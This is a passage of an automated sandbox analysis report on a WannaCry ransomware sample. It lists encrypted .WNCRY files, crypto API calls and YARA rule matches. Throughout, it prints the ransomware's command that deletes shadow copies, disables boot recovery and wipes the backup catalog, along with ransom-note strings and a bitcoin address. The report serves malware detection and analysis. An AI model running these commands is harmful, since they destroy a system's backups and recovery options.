                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsconversions.txt.WNCRY (copy) entropy: 7.99985256158Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsconversions.txt.WNCRY (copy) entropy: 7.9996594959Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsglobals.txt.WNCRY (copy) entropy: 7.99498846899Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingssynonyms.txt.WNCRY (copy) entropy: 7.99794267858Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d33fc00a-caf3-45c1-9fbf-c4db6e8b3d32}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99911564973Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99911828828Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_10[1].txt.WNCRY (copy) entropy: 7.99912612001Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_11[1].txt.WNCRY (copy) entropy: 7.99383164618Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_12[1].txt.WNCRY (copy) entropy: 7.99923155964Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_13[1].txt.WNCRY (copy) entropy: 7.99642776079Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_15[1].txt.WNCRY (copy) entropy: 7.99862580759Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_16[1].txt.WNCRY (copy) entropy: 7.9979534592Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_18[1].txt.WNCRY (copy) entropy: 7.99842420769Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_19[1].txt.WNCRY (copy) entropy: 7.99847497327Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_20[1].txt.WNCRY (copy) entropy: 7.99703331127Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_21[1].txt.WNCRY (copy) entropy: 7.99590248062Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_22[1].txt.WNCRY (copy) entropy: 7.99903385181Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_24[1].txt.WNCRY (copy) entropy: 7.99562141231Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_25[1].txt.WNCRY (copy) entropy: 7.99477062458Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_26[1].txt.WNCRY (copy) entropy: 7.99978888346Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_27[1].txt.WNCRY (copy) entropy: 7.99819585174Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_28[1].txt.WNCRY (copy) entropy: 7.99898605841Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_2[1].txt.WNCRY (copy) entropy: 7.99733937527Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_4[1].txt.WNCRY (copy) entropy: 7.9911145004Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_6[1].txt.WNCRY (copy) entropy: 7.99458754298Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_7[1].txt.WNCRY (copy) entropy: 7.9989785552Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_8[1].txt.WNCRY (copy) entropy: 7.99567237592Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_9[1].txt.WNCRY (copy) entropy: 7.99704286853Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.WNCRY (copy) entropy: 7.99635137947Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg.WNCRY (copy) entropy: 7.99559540668Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRY (copy) entropy: 7.99855344588Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196552179353449.txt.WNCRY (copy) entropy: 7.99850576109Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{6d27d8af-3d9b-4d29-b5de-77687cff7d14}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99522443999Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196552479439416.txt.WNCRY (copy) entropy: 7.998558746Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRY (copy) entropy: 7.99855344588Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196552779536724.txt.WNCRY (copy) entropy: 7.99837283771Jump to dropped file
                  Contains functionalty to change the wallpaper
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,25_2_00407E80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,29_2_00407E80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,38_2_00407E80
                  Deletes shadow drive data (may be related to ransomware)
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
                  Source: 2N2jefqo8e.exe, 00000000.00000003.1955905665.0000000000A73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: 2N2jefqo8e.exe, 00000000.00000003.1955905665.0000000000A73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
                  Source: 2N2jefqo8e.exe, 00000000.00000003.2867204725.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: 2N2jefqo8e.exe, 00000000.00000003.2867204725.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
                  Source: @WanaDecryptor@.exeBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: @WanaDecryptor@.exe, 00000019.00000000.2870171547.000000000041F000.00000008.00000001.01000000.00000008.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: @WanaDecryptor@.exe, 00000019.00000000.2870171547.000000000041F000.00000008.00000001.01000000.00000008.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
                  Source: @WanaDecryptor@.exe, 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet &
                  Source: @WanaDecryptor@.exe, 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet &
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
                  Source: @WanaDecryptor@.exeBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: @WanaDecryptor@.exe, 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet &
                  Source: @WanaDecryptor@.exe, 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet &
                  Source: @WanaDecryptor@.exe, 0000001D.00000002.2976309612.00000000005A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietC:\Windows\S\Registry\Machine\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=16OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VB\Registry\Machine\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\GRE_InitializeFamily 6 ModJ
                  Source: @WanaDecryptor@.exe, 0000001D.00000000.2872621577.000000000041F000.00000008.00000001.01000000.00000008.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: @WanaDecryptor@.exe, 0000001D.00000000.2872621577.000000000041F000.00000008.00000001.01000000.00000008.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
                  Source: @WanaDecryptor@.exe, 0000001D.00000002.2975188461.000000000019B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: u/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: @WanaDecryptor@.exe, 0000001D.00000002.2975188461.000000000019B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ]Zvcmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete Jump to behavior
                  Source: @WanaDecryptor@.exeBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,25_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,25_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004046F0 CryptImportKey,25_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,29_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,29_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004046F0 CryptImportKey,29_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,38_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,38_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004046F0 CryptImportKey,38_2_004046F0

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 2N2jefqo8e.exe, type: SAMPLEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 2N2jefqo8e.exe, type: SAMPLEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 2N2jefqo8e.exe, type: SAMPLEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                  Source: 29.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 38.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 25.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 50.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 25.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 46.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 50.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 29.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 38.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 46.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 0.0.2N2jefqo8e.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 0.0.2N2jefqo8e.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 0.0.2N2jefqo8e.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                  Source: 00000000.00000000.1583437170.000000000040E000.00000008.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\Users\user\Desktop\r.wnry, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\Users\user\Desktop\u.wnry, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\Users\user\Desktop\140021675181576.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
